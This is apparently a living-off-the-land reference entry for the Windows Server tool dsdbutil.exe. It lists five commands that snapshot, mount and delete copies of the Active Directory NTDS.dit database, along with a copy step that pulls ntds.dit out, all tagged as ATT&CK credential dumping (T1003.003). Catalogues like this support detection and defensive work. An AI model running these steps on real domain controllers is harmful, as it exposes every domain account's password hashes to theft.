.. /dsdbutil.exe
Star

Dump

Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.

Paths:

Resources:

Acknowledgements:

Detections:

Dump

  1. dsdbutil supports VSS snapshot creation

    dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
    Use case
    Snapshoting of Active Directory NTDS.dit database
    Privileges required
    Administrator
    Operating systems
    Windows Server 2012, Windows Server 2016, Windows Server 2019
    ATT&CK® technique
    T1003.003
  2. Mounting the snapshot with its GUID

    dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
    Use case
    Mounting the snapshot to access the ntds.dit with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
    Privileges required
    Administrator
    Operating systems
    Windows Server 2012, Windows Server 2016, Windows Server 2019
    ATT&CK® technique
    T1003.003
  3. Deletes the mount of the snapshot

    dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"
    Use case
    Deletes the snapshot
    Privileges required
    Administrator
    Operating systems
    Windows Server 2012, Windows Server 2016, Windows Server 2019
    ATT&CK® technique
    T1003.003
  4. Mounting with snapshot identifier

    dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
    Use case
    Mounting the snapshot identifier 1 and accessing it with with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
    Privileges required
    Administrator
    Operating systems
    Windows Server 2012, Windows Server 2016, Windows Server 2019
    ATT&CK® technique
    T1003.003
  5. Deletes the mount of the snapshot

    dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"
    Use case
    deletes the snapshot
    Privileges required
    Administrator
    Operating systems
    Windows Server 2012, Windows Server 2016, Windows Server 2019
    ATT&CK® technique
    T1003.003